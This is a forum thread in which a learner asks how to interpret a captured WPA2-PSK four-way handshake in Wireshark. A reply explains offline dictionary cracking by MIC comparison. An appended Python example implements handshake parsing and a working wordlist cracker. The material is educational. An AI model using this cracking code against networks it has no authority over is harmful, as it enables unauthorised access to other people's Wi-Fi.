Thread: Where're the goods in this WPA2 handshake?

  1. #1
    Join Date
    2017-May
    Location
    Here...
    Posts
    12

    Where're the goods in this WPA2 handshake?

    I'm still a bit on shaky ground when it comes to understanding the ins and outs of WPA vs WPA2-PSK handshakes. I think (but I'm not sure) that a lot of my confusion is caused by subtle differences in the way that differing sources use terminology. For example, earlier I was of the understanding that the correct terms for the two security protocols were "WPA" and "WPA2-PSK", and I thought that I had it down correct that a WPA2-PSK network would have its authentication goods transmitted over the airwaves in the form of an encrypted key, whereas a WPA network would have its authentication goods transmitted over the airwaves in the form of a plain-text PIN number.
    However, I happened across a www page earlier that listed the two network security protocols as WPA-PSK and WPA2-PSK.

    It does get frustrating at first, when you think you have something down, then spot one or two takes on it that more or less shatter what you thought you knew. Then you backtrack a little bit, trying to salvage what you can of what you've already been basing some of your assumptions on... Then you move ahead a little bit more, gaining a small amount of knowledge and experience until the next time that s**t seems to hit the fan... And the cycle repeats, etc., etc., etc., ...

    This post is mainly during one of those "backtracking" phases, where I previously thought that I had a decent working perception of some things, but have recently started to notice that certain parts of that understanding are breaking down and not holding water as much as they previously used to. The thing is that I am unable to identify and/or explain exactly *** is going on. I only know that something is wrong somewhere, but cannot tell exactly where it is messed up.

    ===

    This post is also about me trying to hone in on what I should be looking for when examining a data capture with Wireshark. Basically, I have a capture of what I'm almost certain is a valid handshake (the four handshake packets passed all of the scrutiny that I could give them, and I was also watching Wireshark do its thing when I re-authenticated with the router and then saw it catch the four EAPOL packets as I re-authenticated).
    I'll be using the six images listed below as reference quite a bit. The image names, their descriptions, and the imgur links to them are:
    1) my_handshake.png; A screenshot of a Wireshark capture. The 4 EAPOL packets that make up the capture are in the middle of the pic (#'s 167,168,169,&170).
    http://imgur.com/a/0RmjL
    2) mh_pckt1.png; A screenshot of "Key (Message 1 of 4)".
    http://imgur.com/a/0RmjL
    3) mh_pckt2.png; A screenshot of "Key (Message 2 of 4)".
    http://imgur.com/a/0RmjL
    4) mh_pckt3.png; A screenshot of "Key (Message 3 of 4)".
    http://imgur.com/a/0RmjL
    5) mh_pckt4.png; A screenshot of "Key (Message 4 of 4)".
    http://imgur.com/a/0RmjL
    6) 4-way-handshake_WPA2.png; This is a pic of a WPA2 4-way handshake (I use it as desktop wallpaper because it helps me to memorize the pic better).
    http://imgur.com/a/0RmjL

    Also for reference is an article from http://www.kalitutorials.net/2014/06...handshake.html titled "Hack WPA/WPA2 PSK Capturing the Handshake". When I'm learning something from online, I'll try to use about 3-4 sources. That way, if there's any confusion about something then I can look at the other sources to see how they put it. Sometimes it helps to clear up some confusion, but mostly it just lets me know if my take on things is right or wrong.

    This particular handshake is of me authenticating with a netgear router over a WLAN network named "NETGEAR-Guest". Its security is WPA2.

    To begin with, after getting a capture and going through it to see if there might be a valid handshake in it, I spot the four packets with a "No." of 167, 168, 169, & 170 (see the screenshot "my_handshake.png"). Those four packets look like they could very well be a valid handshake because: 1) The packets are all of the EAPOL "Protocol"; 2) All four messages appear to have been successfully captured, as the "Info" field's values for those packets are "Key (Message 1 of 4)", "Key (Message 2 of 4)", "Key (Message 3 of 4)", and "Key (Message 4 of 4)"; 3) Lastly, what I notice about that screenshot is that the "Source" field for those packets appears as if communication has taken place between only two parties (between 86:1b:5e:42:b3:27 and IntelCor_e0:85:dd). Aside from the fact that the "Destination" field is empty for those four packets (I don't know why I never wondered too much about it before), all seems to be in good shape so far.
    So, after looking through the Wireshark capture and deciding that if there's a valid handshake in it, that it'll probably be those four packets, I look deeper into the first one (see "mh_pckt1.png") by highlighting packet #167 and then expanding the entries for "802.1x Authentication" and "WPA Key Data:". The replay counter is 0 for this first one. "It'll be great if the 2nd packet's replay counter is also 0, and then packets #3 and #4 both have a replay counter that's 1", I think to myself. Looking at it also with the diagram in "4-way-handshake_WPA2.png" in mind (I'm memorizing that particular diagram to get the handshake process down), I remember that the first step in the process is for an Anonce to go from the AP to the STA. This makes me wonder if (in the pic of the first packet) the entry "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. ." is what that Anonce refers to? If I got it correct, what I'm seeing is the AP sending an Anonce to the STA (& then the STA, or client, can go ahead with making the PTK)?
    Moving on to look at the 2nd packet (see "mh_pckt2.png") I can see that this one also has a replay counter of 0, so that's good. If I'm looking at the process of the STA sending an Snonce to the AP (together with a MIC), then I guess "WPA Key Nonce: d28cd01c5983d08156ffb305cf86d01810e5ac804e0f4d6c.. ." would be that Snonce that it's talking about. Looking at Wireshark's top pane, I'm thinking that the Source = 86:1b:5e:42:b3:27 must be the router (since that's the AP), and that Source = IntelCor_e0:85:dd must be the device that I was authenticating on (since that's the STA)? From the way that I understood this step in the handshake, the STA is also supposed to send a MIC, including authentication, which is really an MAIC. "Okay", I'm thinking, "I don't need to learn ALL of the particulars at this stage in my learning, but just improve my Wireshark capture reading skills some." Well, looking at the pic, I'm thinking that "WPA Key MIC: 9679ad0d48a613488e68577dadc970cf" might be the MIC and "WPA Key Data: 30140100000fac040100000fac040100000fac020000" might be the PTK (although I don't exactly remember reading that the PTK gets exposed over the airwaves)?
    Moving on to the 3rd packet (see "mh_pckt3.png")... This one has a replay counter of 1, so that's good. From what all I've learned about it so far, I think that this packet might be the golden goose (correct me if I'm wrong)? If I'm correct, this is the step where the AP sends a GTK and a sequence number with another MIC. Well, I don't know exactly what the GTK is, besides it maybe standing for "Global Temporal Key". Looking at the Wireshark capture for that packet, I guess the GTK might be "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. .", but I'd be lucky to be correct about that? The MIC looks to be "WPA Key MIC: ed8747d1f66d53e05c80171290e6a377"? And, the part that I'm really interested in is the "WPA Key Data: 12bfb55a99d08b44136c7fbf84075cebbec1d67fbf6b1f22.. ."? The entry just above that one shows its data length to be 56. Using that info along with the fact that the WPA Key Data seems to be incomplete (because it ends with "...") prompts me to look at Wireshark's bottom pane where the Hex dump is. There, the WPA Key Data is listed in its entirety? Unless I'm mistaken, isn't that WPA Key Data what I'll want to crack to get the ASCII form of the password??? If that's not the encrypted password that I'm wanting to be able to successfully authenticate with the router, then where should I look for the correct one (the last two questions are the money questions)???
    As for the fourth and final packet of the handshake ("mh_pckt4.png"), I didn't look at it much, beyond checking to see if its replay counter was also 1 (which it was). There are bound to be some errors in the above text with all the copying and pasting that I was doing, and the fact that I'm still learning about the whole WPA2-PSK handshake process.

    NOTE - I had written this post before knowing about it going here, so the image names that I have listed above are pretty useless. In the end, I posted all of the pics to an imgur album, instead of uploading them. The correct way that they are laid out is, from top to bottom: the four packets of the entire handshake, packet1, packet2, packet3, packet4, and a diagram of the wpa2-psk handshake process.

    Thanks for any feedback, comments, or corrections on this post.
    Give a man a fish and you feed him for a day. Don't give a man a fish and feed yourself instead. He's a grown man. And fishing's not that hard.

  2. #2
    Join Date
    2016-Oct
    Location
    /dev/sda
    Posts
    1,012
    There are some questions in your post. Can you list them at the bottom?

  3. #3
    Join Date
    2017-May
    Location
    Here...
    Posts
    12
    Okay. I was hesitant to edit the original post any in case I altered it and made it illegible, so I went through it and listed the questions in this post (an "*" precedes each question):


    In the original post, these first 3 questions are actually towards the end, but since they're the most important ones of the bunch, I've included them here as the first ones ( go to http://imgur.com/a/0RmjL and then scroll down to the 4th pic)...

    * Looking at packet3... Is the "WPA Key Data: 12bfb55a99d08b44136c7fbf84075cebbec1d67fbf6b1f22.. ." entry the encrypted key that needs to be cracked before it can then be used to access the network?

    * This is a continuation of the above question... The entry just above that one shows its data length to be 56. Using that info along with the fact that the WPA Key Data seems to be incomplete (because it ends with "...") prompts me to look at Wireshark's bottom pane where the Hex dump is. There, the WPA Key Data seems to be listed in its entirety. Unless I'm mistaken, isn't that WPA Key Data what I'll want (and need) to crack, to get the ASCII form of the password???

    * This is also a continuation of the above question... If that's not the encrypted password that I'm wanting, to be able to successfully authenticate with the router, then where should I look for the correct one (this question and the above 2 questions are the most important two in the entire post)???

    ===

    * This question is from the 1st paragraph in the OP (original post). There're no explicit "?"'s in that paragraph, but as I looked at it just now, I figured that I'd better fix any misunderstandings of them now if I can.
    I nearly always see only WPA2-PSK & WPA networks while scanning. I have seen one WEP network, but it was rare (probably around 1 in 40 or 50), and I would think that I'll probably see less and less of those as time goes by, so I only concern myself with the WPA2-PSK & WPA networks.
    In literature, nearly all of the sources that I've read list the two networks as being called either WPA2-PSK or WPA. So, after I was confident that I would be using the correct terms, I tended to use only the two terms "WPA2-PSK" & "WPA" to describe those two types of security.
    But then just the other day, I was reading an article and it gave a broad description of those two types of security that left me scratching my head a bit. Knowing what little bit I knew as of then, and also trying to reconcile what the article was saying, I began questioning the types of network security that do exist.
    So, those questions would be:
    Is there such a network security type that is termed "WPA" (without the "-PSK" suffixed to it)?
    Is there such a network security type that is termed "WPA-PSK"?
    Is there such a network security type that is termed "WPA2" (without the "-PSK" suffixed to it)?
    Is there such a network security type that is termed "WPA2-PSK"?
    The above four questions probably seem trivial to experts. The reason I ask them in the manner that they are written is because sometimes it seems as if some sources use network security terms either just a little bit incorrectly, or I am just mistaken in the way that I've interpreted things so far. See, I was of the impression that there is just WPA2-PSK or WPA but, once I saw an article put it as "WPA-PSK", I began to wonder if I had had it all wrong up to that point, because I've never seen a network security listed as being "WPA-PSK" in all of the captures that I've done (quite a lot of captures to me, but that amount would probably seem like a drop in the bucket to veterans). So, I'm just trying to poke holes in my understanding of them, so that I can get rid of any mistaken perceptions.

    * This question is mostly one of curiosity, but I don't think that it's a real important one. While writing the OP, I just noticed myself wondering about it for about the 10th time and wanted to know the answer to it if I could find one (sort of like swatting a bee that keeps hovering around you but not really doing any harm - it's just annoying after awhile).
    In the OP, at around the 7th paragraph down, where it reads, "...Destination field is empty for those four packets..." - Why is the Destination field for those four packets empty?
    What I mean is that when I navigate to http://imgur.com/a/0RmjL and then look at the top image (the one with the caption "The screenshot of an initial WPA2-PSK handshake."), I keep noticing that the four packets (# 167,168,169,&170) have an empty "Destination" field (the 3rd column from the left). For instance, the "Source" field has entries in it but the "Destination" field is empty for those four packets. I would expect the "Destination" field for those four packets to contain the same entries that're in the "Source" field, just in the opposite alternating order, but for some reason the "Destination" field is empty for those packets even though they are showing up in the Wireshark capture. Why is the "Destination" field for these four EAPOL packets empty?

    * This is the question in the OP that starts around the 8th paragraph ("So, after looking through the Wireshark capture..."). By looking at the pic captioned "packet1" (> http://imgur.com/a/0RmjL > 2nd pic down captioned "packet1").
    Looking at the middle pane in that pic, at the "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. ." entry... Is that the part of the handshake process where the AP sends a nonce value to the STA, and then the STA can make a pairwise transient key?

    * Taking a look into the second packet (> http://imgur.com/a/0RmjL > 3rd pic down, where caption = packet2)... Is the "WPA Key Nonce: d28cd01c5983d08156ffb305cf86d01810e5ac804e0f4d6c.. ." entry (the 6th entry above the highlighted entry, in the middle pane)... Is that entry the nonce value that the STA sends to the AP (along with an MIC - but the MIC is not included in this particular entry)?

    * Also looking at the pic where caption = packet2... Looking at Wireshark's top pane, I'm thinking that the Source = 86:1b:5e:42:b3:27 must be the router (since that's the AP), and that Source = IntelCor_e0:85:dd must be the device that I was authenticating on (since that's the STA)?
    This question arises because I'm just wanting to confirm or deny if my thinking is correct that the AP is often times the router, and the STA is the client (or the machine that you deauthenticate, so that it then reauthenticates allowing you to capture a handshake).

    * Also looking at the pic where caption = packet2... Is the "WPA Key MIC: 9679ad0d48a613488e68577dadc970cf" entry (in the pic, it's 2 up from the highlighted entry, in the middle pane) the MIC that's referred to in the following excerpt?
    [excerpt --->] "2) The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC)."

    * Also looking at the pic where caption = packet2... Is the "WPA Key Data: 30140100000fac040100000fac040100000fac020000" entry (the highlighted one in the middle pane) the PTK?
    I was thinking that it might be, although I don't remember ever reading that the PTK gets exposed over the airwaves? Or, maybe I'm just confusing the PTK with the PMK, and the PMK doesn't get shared over the network much, whereas the PTK might?

    * Finally, we reach the 3rd packet (caption = packet3). From what all I've learned about it so far, I think that this packet might be the encrypted key that needs to be cracked in order to gain access to the network (correct me if I'm wrong)?

    * Also looking at packet3... Is this the step in the handshake process where the AP sends the GTK (and a sequence number together with another MIC)?

    * Also looking at packet3... Is the "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. ." entry the GTK data?

    * Also looking at packet3... Is the "WPA Key MIC: ed8747d1f66d53e05c80171290e6a377" the MIC data that's referred to by the following excerpt?
    [excerpt --->] "3) The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection."

    ===

    Please don't hesitate to ask me to clear up anything else about this post or the original post. I'm pretty familiar with looking at the capture, so that I probably don't pick up on some things that may be confusing to others. I tried to be somewhat organized when writing the OP (original post), but it became so long that the organization for it that I had in mind at the onset quickly went to the wayside.

  4. #4
    Join Date
    2016-Oct
    Location
    /dev/sda
    Posts
    1,012
    WPA is a general term referring to the Wi-Fi Protected Access algorithm. It has 2 types:
    WPA-PSK
    WPA-Enterprise
    Later, its extension WPA2 was created, which is more secure and faster in encryption and decryption. The WPA types were also replaced by WPA2 as:
    WPA2-PSK
    WPA2-Enterprise

    When you see WPA/WPA2-PSK written it means WPA-PSK/WPA2-PSK. WPA is a little different from WPA2 so calling WPA2 as WPA is also incorrect if you want to avoid confusion between the two. WPA uses TKIP which is an encryption protocol and the encryption algorithm is RC4. WPA2 uses AES-CCMP for encryption which is faster than RC4 cryptography.

    In the 4-way handshake, packet 1 has the Nonce generated by the AP. Packet 2 has the Nonce generated by the client. The WPA data in packet 1 and packet 2 is just an RSNA (Robust Security Network Algorithm) ID. It has no significant contribution to the handshake. It is just a packet format.

    In packet 3, the nonce is the same as the nonce in packet 1 because it was generated by the AP earlier. This time the WPA data has the encrypted GTK, but even that is not used for wifi cracking.

    Open the frame tab of the EAPOL packet; it has a MAC header of 12 bytes: 6 bytes of source MAC and 6 bytes of destination MAC. Your destination MAC address must be listed there.

    So basically no actual key is sent over the network, so how do you crack a wifi password using a wordlist?
    The solution is in step 4, which is the MIC or MAC (Message Authentication Code, same thing) which I can see in the handshake. Just like the client and AP initially start from your wifi password to generate keys and the MIC using the WPA/WPA2 algorithm, I also start from my wordlist and the captured handshake to generate keys and a MIC using a GPU. Then I check whether my MIC matches the MIC captured in the handshake earlier. If it matches, then you have the right password. The probability of having an incorrect password but the right MIC is 1/2^128, which is close to zero, so there is very little chance of that happening.
    Last edited by _defalt; 2017-05-30 at 13:00.
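
Worked example, added here and not part of the thread: the EAPOL-Key fields the OP was reading off Wireshark (Key Information flags, replay counter, nonce, MIC, key data) and the cracking procedure _defalt describes in #4, in Python. The frame layout and the derivations follow IEEE 802.11i: PBKDF2-HMAC-SHA1 over passphrase and SSID for the PMK, PRF-512 over PMK, both MACs and both nonces for the PTK, and HMAC-SHA1 with the KCK (first 16 bytes of the PTK) over the EAPOL frame for a WPA2 MIC. Only the SSID "NETGEAR-Guest" and the message-2 RSN IE bytes come from the posts; the MACs, the nonces, the passphrase "correct horse" and the 56-byte stand-in for message 3's wrapped GTK are constructed placeholders. The MIC it checks is the one on message 2, the first frame that carries a MIC, which together with the ANonce from message 1 is all a cracker needs.

```python
"""Added example (not from the thread): build, parse and MIC-check the four WPA2-PSK
EAPOL-Key frames.  Layout and key derivation follow IEEE 802.11i; every MAC, nonce,
passphrase and GTK blob below is a constructed placeholder."""
import hashlib
import hmac
import struct

# Key Information flags; bits 0-2 hold the descriptor version (1 = WPA/HMAC-MD5, 2 = WPA2/HMAC-SHA1)
KEY_INFO_VERSION_MASK = 0x0007
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200

EAPOL_HDR = struct.Struct("!BBH")  # 802.1X version, packet type (3 = EAPOL-Key), body length
# descriptor type, key info, key length, replay counter, nonce, IV, RSC, key ID, MIC, key data length
KEY_HDR = struct.Struct("!BHH8s32s16s8s8s16sH")
MIC_OFFSET = EAPOL_HDR.size + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8  # 81: where the 16-byte MIC sits
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # message-2 key data quoted in post #1


def build_eapol_key(key_info, replay, nonce, key_data, mic=b"\x00" * 16):
    """Serialise one EAPOL-Key frame with descriptor type 2 (RSN, i.e. WPA2)."""
    body = KEY_HDR.pack(2, key_info, 16, replay.to_bytes(8, "big"), nonce, b"\x00" * 16,
                        b"\x00" * 8, b"\x00" * 8, mic, len(key_data)) + key_data
    return EAPOL_HDR.pack(2, 3, len(body)) + body


def parse_eapol_key(frame):
    """Extract the fields Wireshark shows and classify the frame as message 1..4 (RSN heuristic)."""
    if EAPOL_HDR.unpack_from(frame)[1] != 3:
        raise ValueError("not an EAPOL-Key frame")
    _, key_info, _, replay, nonce, _, _, _, mic, data_len = KEY_HDR.unpack_from(frame, EAPOL_HDR.size)
    has_mic, has_ack = bool(key_info & KEY_INFO_MIC), bool(key_info & KEY_INFO_ACK)
    if not has_mic and has_ack:
        msg = 1                                        # AP -> STA: ANonce, no key yet so no MIC
    elif has_mic and has_ack and key_info & KEY_INFO_INSTALL:
        msg = 3                                        # AP -> STA: ANonce again, wrapped GTK in key data
    elif has_mic and not has_ack:                      # STA -> AP: SNonce + MIC (2) or bare confirmation (4)
        msg = 4 if (key_info & KEY_INFO_SECURE or data_len == 0) else 2
    else:
        raise ValueError("unexpected Key Information 0x%04x" % key_info)
    return {"msg": msg, "version": key_info & KEY_INFO_VERSION_MASK, "replay": int.from_bytes(replay, "big"),
            "nonce": nonce, "mic": mic, "key_data": frame[EAPOL_HDR.size + KEY_HDR.size:][:data_len]}


def pmk_from_passphrase(passphrase, ssid):
    """PSK networks: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]  # KCK = [:16] (signs EAPOL MICs), KEK = [16:32], TK = [32:48]


def eapol_mic(kck, frame, version):
    """MIC over the whole EAPOL frame with the MIC field zeroed: HMAC-MD5 for v1, HMAC-SHA1 for v2."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]


def make_handshake(ssid, passphrase, ap_mac, sta_mac, anonce, snonce):
    """Constructed four-way handshake with replay counters 0,0,1,1 like the thread's capture."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]

    def sign(frame):
        return frame[:MIC_OFFSET] + eapol_mic(kck, frame, 2) + frame[MIC_OFFSET + 16:]

    return [build_eapol_key(0x008A, 0, anonce, b""),                  # 1: ANonce
            sign(build_eapol_key(0x010A, 0, snonce, RSN_IE)),         # 2: SNonce + MIC + RSN IE
            sign(build_eapol_key(0x13CA, 1, anonce, b"\x00" * 56)),   # 3: 56-byte stand-in for wrapped GTK
            sign(build_eapol_key(0x030A, 1, b"\x00" * 32, b""))]      # 4: MIC only


def crack_handshake(ssid, ap_mac, sta_mac, frames, wordlist):
    """Post #4's procedure: PMK -> PTK -> MIC per candidate, compared with the captured message-2 MIC."""
    parsed = {}
    for frame in frames:
        info = parse_eapol_key(frame)
        parsed[info["msg"]] = (info, frame)
    (m1, _), (m2, m2_frame) = parsed[1], parsed[2]
    if m1["replay"] != m2["replay"]:
        raise ValueError("message 2 does not answer message 1 (replay counter mismatch)")
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, m1["nonce"], m2["nonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, m2_frame, m2["version"]), m2["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    ap, sta = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")  # placeholder MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # placeholder nonces
    frames = make_handshake("NETGEAR-Guest", "correct horse", ap, sta, anonce, snonce)
    for p in map(parse_eapol_key, frames):
        print("Key (Message %d of 4)  replay=%d  mic=%s  key_data=%d bytes"
              % (p["msg"], p["replay"], p["mic"].hex(), len(p["key_data"])))
    print("recovered passphrase:", crack_handshake("NETGEAR-Guest", ap, sta, frames,
                                                   ["password", "12345678", "correct horse"]))
```

Run as is, it prints the four classified frames (message 1 with an all-zero MIC, message 3 with 56 bytes of key data, message 4 with none) and then recovers "correct horse" from the three-word list. A sanity check for the PMK step is the IEEE 802.11i Annex test vector: passphrase "password" with SSID "IEEE" must give f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e, the same value `wpa_passphrase IEEE password` prints. The replay-counter check matters on real captures: a message 2 whose counter does not match message 1 may belong to a different handshake attempt, which is one way a capture that looks complete in Wireshark still fails in aircrack-ng or hashcat.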
